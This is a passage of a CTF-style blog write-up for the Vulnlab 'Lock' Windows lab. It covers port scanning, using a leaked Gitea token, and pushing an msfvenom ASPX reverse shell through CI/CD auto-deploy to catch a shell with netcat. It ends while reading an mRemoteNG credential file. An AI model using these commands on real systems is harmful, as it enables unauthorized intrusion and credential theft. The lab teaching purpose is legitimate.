<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"><title>Lock - Vulnlab | serioton</title><meta name="author" content="serioton"><meta name="copyright" content="serioton"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="Lock is an easy windows box from Vulnlab created by xct and kozmer. It involves gaining a foothold by abusing CI&#x2F;CD in Gitea to upload a shell, decrypting mRemoteNG configs, and gaining system ac">
<meta property="og:type" content="article">
<meta property="og:title" content="Lock - Vulnlab">
<meta property="og:url" content="https://seriotonctf.github.io/2024/01/20/Lock-Vulnlab/index.html">
<meta property="og:site_name" content="serioton">
<meta property="og:description" content="Lock is an easy windows box from Vulnlab created by xct and kozmer. It involves gaining a foothold by abusing CI&#x2F;CD in Gitea to upload a shell, decrypting mRemoteNG configs, and gaining system ac">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://1897091482-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FI3I73FFqB6GvT8N5Mt1N%2Fuploads%2FqlrTgqfYZ2LxYiFsS7F0%2Flock_slide.png?alt=media&token=4a34abe6-3e20-4725-9334-bd39e2db903a">
<meta property="article:published_time" content="2024-01-20T18:44:31.000Z">
<meta property="article:modified_time" content="2024-11-13T09:26:07.912Z">
<meta property="article:author" content="serioton">
<meta property="article:tag" content="vulnlab">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://1897091482-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FI3I73FFqB6GvT8N5Mt1N%2Fuploads%2FqlrTgqfYZ2LxYiFsS7F0%2Flock_slide.png?alt=media&token=4a34abe6-3e20-4725-9334-bd39e2db903a"><link rel="shortcut icon" href="/img/iconcat.png"><link rel="canonical" href="https://seriotonctf.github.io/2024/01/20/Lock-Vulnlab/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"languages":{"hits_empty":"We didn't find any results for the search: ${query}"}},
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":false,"highlightHeightLimit":false},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  }
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Lock - Vulnlab',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2024-11-13 09:26:07'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
    win.getCSS = url => new Promise((resolve, reject) => {
      const link = document.createElement('link')
      link.rel = 'stylesheet'
      link.href = url
      link.onload = () => resolve()
      link.onerror = () => reject()
      document.head.appendChild(link)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
          const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
          const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
          const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

          if (t === undefined) {
            if (isLightMode) activateLightMode()
            else if (isDarkMode) activateDarkMode()
            else if (isNotSpecified || hasNoSupport) {
              const now = new Date()
              const hour = now.getHours()
              const isNight = hour <= 6 || hour >= 18
              isNight ? activateDarkMode() : activateLightMode()
            }
            window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
              if (saveToLocal.get('theme') === undefined) {
                e.matches ? activateDarkMode() : activateLightMode()
              }
            })
          } else if (t === 'light') activateLightMode()
          else activateDarkMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/cat.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">31</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">10</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">3</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/train_travel.jpg')"><nav id="nav"><span id="blog-info"><a href="/" title="serioton"><img class="site-icon" src="/img/cat.jpg"/><span class="site-name">serioton</span></a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search" href="javascript:void(0);"><i class="fas fa-search fa-fw"></i><span> Search</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Lock - Vulnlab</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="fa-fw post-meta-icon far fa-calendar-alt"></i><span class="post-meta-label">Created</span><time datetime="2024-01-20T18:44:31.000Z" title="Created 2024-01-20 18:44:31">2024-01-20</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/writeups/">writeups</a></span></div><div class="meta-secondline"></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>Lock is an easy windows box from Vulnlab created by xct and kozmer. It involves gaining a foothold by abusing CI&#x2F;CD in Gitea to upload a shell, decrypting mRemoteNG configs, and gaining system access by exploiting the MSI installer in PDF24 Creator.</p>
<h1 id="NMAP"><a href="#NMAP" class="headerlink" title="NMAP"></a>NMAP</h1><p>As always, we start with a standard nmap scan</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">PORT     STATE SERVICE</span><br><span class="line">80/tcp   open  http</span><br><span class="line">445/tcp  open  microsoft-ds</span><br><span class="line">3000/tcp open  ppp</span><br><span class="line">3389/tcp open  ms-wbt-server</span><br><span class="line">5357/tcp open  wsdapi</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line">➜  sudo nmap -sCV -p80,445,3000,3389,5357 --min-rate=5000 10.10.78.126 | tee nmap.txt</span><br><span class="line">[sudo] password for serioton:</span><br><span class="line">Starting Nmap 7.94SVN ( &lt;https://nmap.org&gt; ) at 2024-01-19 08:18 EST</span><br><span class="line">Nmap scan report for lock.vl (10.10.78.126)</span><br><span class="line">Host is up (0.049s latency).</span><br><span class="line"></span><br><span class="line">PORT     STATE SERVICE       VERSION</span><br><span class="line">80/tcp   open  http          Microsoft IIS httpd 10.0</span><br><span class="line">|_http-title: Lock - Index</span><br><span class="line">|_http-server-header: Microsoft-IIS/10.0</span><br><span class="line">| http-methods:</span><br><span class="line">|_  Potentially risky methods: TRACE</span><br><span class="line">445/tcp  open  microsoft-ds?</span><br><span class="line">3000/tcp open  ppp?</span><br><span class="line">| fingerprint-strings:</span><br><span class="line">|   GenericLines, Help, RTSPRequest:</span><br><span class="line">|     HTTP/1.1 400 Bad Request</span><br><span class="line">|     Content-Type: text/plain; charset=utf-8</span><br><span class="line">|     Connection: close</span><br><span class="line">|     Request</span><br><span class="line">|   GetRequest:</span><br><span class="line">|     HTTP/1.0 200 OK</span><br><span class="line">|     Cache-Control: max-age=0, private, must-revalidate, no-transform</span><br><span class="line">|     Content-Type: text/html; charset=utf-8</span><br><span class="line">....</span><br><span class="line">HttpOnly; SameSite=Lax</span><br><span class="line">|     X-Frame-Options: SAMEORIGIN</span><br><span class="line">|     Date: Fri, 19 Jan 2024 13:18:29 GMT</span><br><span class="line">|     &lt;!DOCTYPE html&gt;</span><br><span class="line">|     &lt;html lang=&quot;en-US&quot; class=&quot;theme-auto&quot;&gt;</span><br><span class="line">|     &lt;head&gt;</span><br><span class="line">|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;&gt;</span><br><span class="line">|     &lt;title&gt;Gitea: Git with a cup of tea&lt;/title&gt;</span><br><span class="line">....</span><br><span class="line">|   HTTPOptions:</span><br><span class="line">|     HTTP/1.0 405 Method Not Allowed</span><br><span class="line">|     Allow: HEAD</span><br><span class="line">|     Allow: GET</span><br><span class="line">|     Cache-Control: max-age=0, private, must-revalidate, no-transform</span><br><span class="line">|     Set-Cookie: i_like_gitea=8754cc9f87bf5b93; Path=/; HttpOnly; SameSite=Lax</span><br><span class="line">|     Set-Cookie: _csrf=JMeupsqJURAdLO4SvVNoOVySlMM6MTcwNTY3MDMxNTA1NTIzMjMwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax</span><br><span class="line">|     X-Frame-Options: SAMEORIGIN</span><br><span class="line">|     Date: Fri, 19 Jan 2024 13:18:35 GMT</span><br><span class="line">|_    Content-Length: 0</span><br><span class="line">3389/tcp open  ms-wbt-server Microsoft Terminal Services</span><br><span class="line">| rdp-ntlm-info:</span><br><span class="line">|   Target_Name: LOCK</span><br><span class="line">|   NetBIOS_Domain_Name: LOCK</span><br><span class="line">|   NetBIOS_Computer_Name: LOCK</span><br><span class="line">|   DNS_Domain_Name: Lock</span><br><span class="line">|   DNS_Computer_Name: Lock</span><br><span class="line">|   Product_Version: 10.0.20348</span><br><span class="line">|_  System_Time: 2024-01-19T13:19:53+00:00</span><br><span class="line">| ssl-cert: Subject: commonName=Lock</span><br><span class="line">| Not valid before: 2023-12-27T14:19:36</span><br><span class="line">|_Not valid after:  2024-06-27T14:19:36</span><br><span class="line">|_ssl-date: 2024-01-19T13:20:32+00:00; -2s from scanner time.</span><br><span class="line">5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-title: Service Unavailable</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>From the Nmap scan, we can see there are 5 ports open.</p>
<h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><p>We start by looking at the website on port 80, but there is nothing interesting so far.</p>
<h1 id="GITEA"><a href="#GITEA" class="headerlink" title="GITEA"></a>GITEA</h1><p>We have Gitea running on port 3000, so let’s go there. There is an interesting script inside the <code>dev-scripts</code> repository of the <code>ellen.freeman</code> user<br><a target="_blank" rel="noopener" href="http://lock.vl:3000/ellen.freeman/dev-scripts/src/branch/main/repos.py">http://lock.vl:3000/ellen.freeman/dev-scripts/src/branch/main/repos.py</a> which looks like it’s using a gitea access token. If we go to the commits we can see the Gitea access token is there in the initial commit:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"># store this in env instead at some point</span><br><span class="line">PERSONAL_ACCESS_TOKEN = &#x27;&lt;REDACTED&gt;&#x27;</span><br><span class="line">...</span><br></pre></td></tr></table></figure>
<p>Great, now we have the access token. What we can do with it? We can place it inside the script we just got and run it like this:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  python3 repos.py &lt;http://lock.vl:3000&gt;</span><br><span class="line">Repositories:</span><br><span class="line">- ellen.freeman/dev-scripts</span><br><span class="line">- ellen.freeman/website</span><br></pre></td></tr></table></figure>
<p>As you can see, there is another repo called “website”, so let’s clone it:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  git config --global http.extraHeader &quot;Authorization: token &lt;REDACTED&gt;&quot;</span><br><span class="line">➜  git clone http://lock.vl:3000/ellen.freeman/website</span><br><span class="line">Cloning into &#x27;website&#x27;...</span><br><span class="line">remote: Enumerating objects: 165, done.</span><br><span class="line">remote: Counting objects: 100% (165/165), done.</span><br><span class="line">remote: Compressing objects: 100% (128/128), done.</span><br><span class="line">remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0</span><br><span class="line">Receiving objects: 100% (165/165), 7.16 MiB | 1.78 MiB/s, done.</span><br><span class="line">Resolving deltas: 100% (35/35), done.</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">➜  cd website</span><br><span class="line">➜  ls</span><br><span class="line">assets  changelog.txt  index.html  readme.md</span><br></pre></td></tr></table></figure>
<p>This looks like it’s the website running on port 80. The <code>README.md</code> file mentions something interesting</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">➜  cat readme.md</span><br><span class="line"># New Project Website</span><br><span class="line"></span><br><span class="line">CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver</span><br></pre></td></tr></table></figure>
<h1 id="Shell-as-ellen-freeman"><a href="#Shell-as-ellen-freeman" class="headerlink" title="Shell as ellen.freeman"></a>Shell as ellen.freeman</h1><p>The README file suggests that any changes made to the repository, such as adding or modifying files, will automatically be deployed to the associated web server. So the idea here to commit an aspx shell, which the CI&#x2F;CD pipeline will then automatically deploy to the web server. Once deployed, we can get a shell by accessing <code>http://lock.vl/shell.aspx</code>.<br>Let’s execute the attack. First, we need to generate an aspx shell using msfvenom like this:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.210 LPORT=443 -f aspx -o exploit.aspx</span><br><span class="line">[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload</span><br><span class="line">[-] No arch selected, selecting arch: x64 from the payload</span><br><span class="line">No encoder specified, outputting raw payload</span><br><span class="line">Payload size: 460 bytes</span><br><span class="line">Final size of aspx file: 3402 bytes</span><br><span class="line">Saved as: exploit.aspx</span><br></pre></td></tr></table></figure>
<p>After that, we need to add the <code>exploit.aspx</code> file to our Git staging area and commit the changes:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜  git add exploit.aspx</span><br><span class="line">➜  git commit -m &quot;meow&quot;</span><br><span class="line">[main d182b50] meow</span><br><span class="line"> 1 file changed, 45 insertions(+)</span><br><span class="line"> create mode 100644 exploit.aspx</span><br></pre></td></tr></table></figure>
<p>Next, we configure our Git to use the authorization token we obtained earlier:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  git config --local http.extraHeader &quot;Authorization: token &lt;REDACTED&gt;&quot;</span><br></pre></td></tr></table></figure>
<p>Finally, we push the commit to the remote repository</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  git push origin main</span><br><span class="line">Enumerating objects: 4, done.</span><br><span class="line">Counting objects: 100% (4/4), done.</span><br><span class="line">Delta compression using up to 4 threads</span><br><span class="line">Compressing objects: 100% (3/3), done.</span><br><span class="line">Writing objects: 100% (3/3), 1.41 KiB | 1.42 MiB/s, done.</span><br><span class="line">Total 3 (delta 1), reused 0 (delta 0), pack-reused 0</span><br><span class="line">remote: . Processing 1 references</span><br><span class="line">remote: Processed 1 references in total</span><br><span class="line">To &lt;http://lock.vl:3000/ellen.freeman/website&gt;</span><br><span class="line">   73cdcc1..d182b50  main -&gt; main</span><br></pre></td></tr></table></figure>
<p>Now, let’s setup a listener and then request our shell like this</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  rlwrap nc -nlvp 443</span><br><span class="line">listening on [any] 443 ...</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">➜  curl &lt;http://lock.vl/exploit.aspx&gt;</span><br></pre></td></tr></table></figure>
<p>We got a shell as the <code>lock\\ellen.freeman</code> user :)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  rlwrap nc -nlvp 443</span><br><span class="line">listening on [any] 443 ...</span><br><span class="line">connect to [10.8.0.210] from (UNKNOWN) [10.10.78.126] 50949</span><br><span class="line">Microsoft Windows [Version 10.0.20348.2159]</span><br><span class="line">(c) Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">c:\\windows\\system32\\inetsrv&gt;whoami</span><br><span class="line">whoami</span><br><span class="line">lock\\ellen.freeman</span><br></pre></td></tr></table></figure>
<h1 id="ellen-freeman-to-gale-dekarios"><a href="#ellen-freeman-to-gale-dekarios" class="headerlink" title="ellen.freeman to gale.dekarios"></a>ellen.freeman to gale.dekarios</h1><p>As you can see, we have another user called <code>gale.dekarios</code> that we need to escalate to</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">PS C:\\Users&gt; ls</span><br><span class="line">ls</span><br><span class="line"></span><br><span class="line">    Directory: C:\\Users</span><br><span class="line"></span><br><span class="line">Mode                 LastWriteTime         Length Name</span><br><span class="line">----                 -------------         ------ ----</span><br><span class="line">d-----        12/27/2023   2:00 PM                .NET v4.5</span><br><span class="line">d-----        12/27/2023   2:00 PM                .NET v4.5 Classic</span><br><span class="line">d-----        12/27/2023  12:01 PM                Administrator</span><br><span class="line">d-----        12/28/2023  11:36 AM                ellen.freeman</span><br><span class="line">d-----        12/28/2023   6:14 AM                gale.dekarios</span><br><span class="line">d-r---        12/27/2023  10:21 AM                Public</span><br></pre></td></tr></table></figure>
<p>Inside ellen.freeman’s Documents directory, there’s an interesting config file</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">PS C:\\temp&gt; cd C:\\users\\ellen.freeman\\documents</span><br><span class="line">PS C:\\users\\ellen.freeman\\documents&gt; ls</span><br><span class="line"></span><br><span class="line">    Directory: C:\\users\\ellen.freeman\\documents</span><br><span class="line"></span><br><span class="line">Mode                 LastWriteTime         Length Name</span><br><span class="line">----                 -------------         ------ ----</span><br><span class="line">-a----        12/28/2023   5:59 AM           3341 config.xml</span><br></pre></td></tr></table></figure>
<p><strong>config.xml</strong></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">mrng:Connections</span> <span class="attr">xmlns:mrng</span>=<span class="string">&quot;&lt;http://mremoteng.org&gt;&quot;</span> <span class="attr">Name</span>=<span class="string">&quot;Connections&quot;</span> <span class="attr">Export</span>=<span class="string">&quot;false&quot;</span> <span class="attr">EncryptionEngine</span>=<span class="string">&quot;AES&quot;</span> <span class="attr">BlockCipherMode</span>=<span class="string">&quot;GCM&quot;</span> <span class="attr">KdfIterations</span>=<span class="string">&quot;1000&quot;</span> <span class="attr">FullFileEncryption</span>=<span class="string">&quot;false&quot;</span> <span class="attr">Protected</span>=<span class="string">&quot;sDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy+1FnqfcPQZ3olLRy+DhDFp&quot;</span> <span class="attr">ConfVersion</span>=<span class="string">&quot;2.6&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">Node</span> <span class="attr">Name</span>=<span class="string">&quot;RDP/Gale&quot;</span> <span class="attr">Type</span>=<span class="string">&quot;Connection&quot;</span> <span class="attr">Descr</span>=<span class="string">&quot;&quot;</span> <span class="attr">Icon</span>=<span class="string">&quot;mRemoteNG&quot;</span> <span class="attr">Panel</span>=<span class="string">&quot;General&quot;</span> <span class="attr">Id</span>=<span class="string">&quot;a179606a-a854-48a6-9baa-491d8eb3bddc&quot;</span> <span class="attr">Username</span>=<span class="string">&quot;Gale.Dekarios&quot;</span> <span class="attr">Domain</span>=<span class="string">&quot;&quot;</span> <span class="attr">Password</span>=<span class="string">&quot;&lt;REDACTED&gt;&quot;</span> <span class="attr">Hostname</span>=<span class="string">&quot;Lock&quot;</span> <span class="attr">Protocol</span>=<span class="string">&quot;RDP&quot;</span> <span class="attr">PuttySession</span>=<span class="string">&quot;Default Settings&quot;</span> <span class="attr">Port</span>=<span class="string">&quot;3389&quot;</span> <span class="attr">ConnectToConsole</span>=<span class="string">&quot;false&quot;</span> <span class="attr">UseCredSsp</span>=<span class="string">&quot;true&quot;</span> <span class="attr">RenderingEngine</span>=<span class="string">&quot;IE&quot;</span> <span class="attr">ICAEncryptionStrength</span>=<span class="string">&quot;EncrBasic&quot;</span> <span class="attr">RDPAuthenticationLevel</span>=<span class="string">&quot;NoAuth&quot;</span> <span class="attr">RDPMinutesToIdleTimeout</span>=<span class="string">&quot;0&quot;</span> <span class="attr">RDPAlertIdleTimeout</span>=<span class="string">&quot;false&quot;</span> <span class="attr">LoadBalanceInfo</span>=<span class="string">&quot;&quot;</span> <span class="attr">Colors</span>=<span class="string">&quot;Colors16Bit&quot;</span> <span class="attr">Resolution</span>=<span class="string">&quot;FitToWindow&quot;</span> <span class="attr">AutomaticResize</span>=<span class="string">&quot;true&quot;</span> <span class="attr">DisplayWallpaper</span>=<span class="string">&quot;false&quot;</span> <span class="attr">DisplayThemes</span>=<span class="string">&quot;false&quot;</span> <span class="attr">EnableFontSmoothing</span>=<span class="string">&quot;false&quot;</span> <span class="attr">EnableDesktopComposition</span>=<span class="string">&quot;false&quot;</span> <span class="attr">CacheBitmaps</span>=<span class="string">&quot;false&quot;</span> <span class="attr">RedirectDiskDrives</span>=<span class="string">&quot;false&quot;</span> <span class="attr">RedirectPorts</span>=<span class="string">&quot;false&quot;</span> <span class="attr">RedirectPrinters</span>=<span class="string">&quot;false&quot;</span> <span class="attr">RedirectSmartCards</span>=<span class="string">&quot;false&quot;</span> <span class="attr">RedirectSound</span>=<span class="string">&quot;DoNotPlay&quot;</span> <span class="attr">SoundQuality</span>=<span class="string">&quot;Dynamic&quot;</span> <span class="attr">RedirectKeys</span>=<span class="string">&quot;false&quot;</span> <span class="attr">Connected</span>=<span class="string">&quot;false&quot;</span> <span class="attr">PreExtApp</span>=<span class="string">&quot;&quot;</span> <span class="attr">PostExtApp</span>=<span class="string">&quot;&quot;</span> <span class="attr">MacAddress</span>=<span class="string">&quot;&quot;</span> <span class="attr">UserField</span>=<span class="string">&quot;&quot;</span> <span class="attr">ExtApp</span>=<span class="string">&quot;&quot;</span> <span class="attr">VNCCompression</span>=<span class="string">&quot;CompNone&quot;</span> <span class="attr">VNCEncoding</span>=<span class="string">&quot;EncHextile&quot;</span> <span class="attr">VNCAuthMode</span>=<span 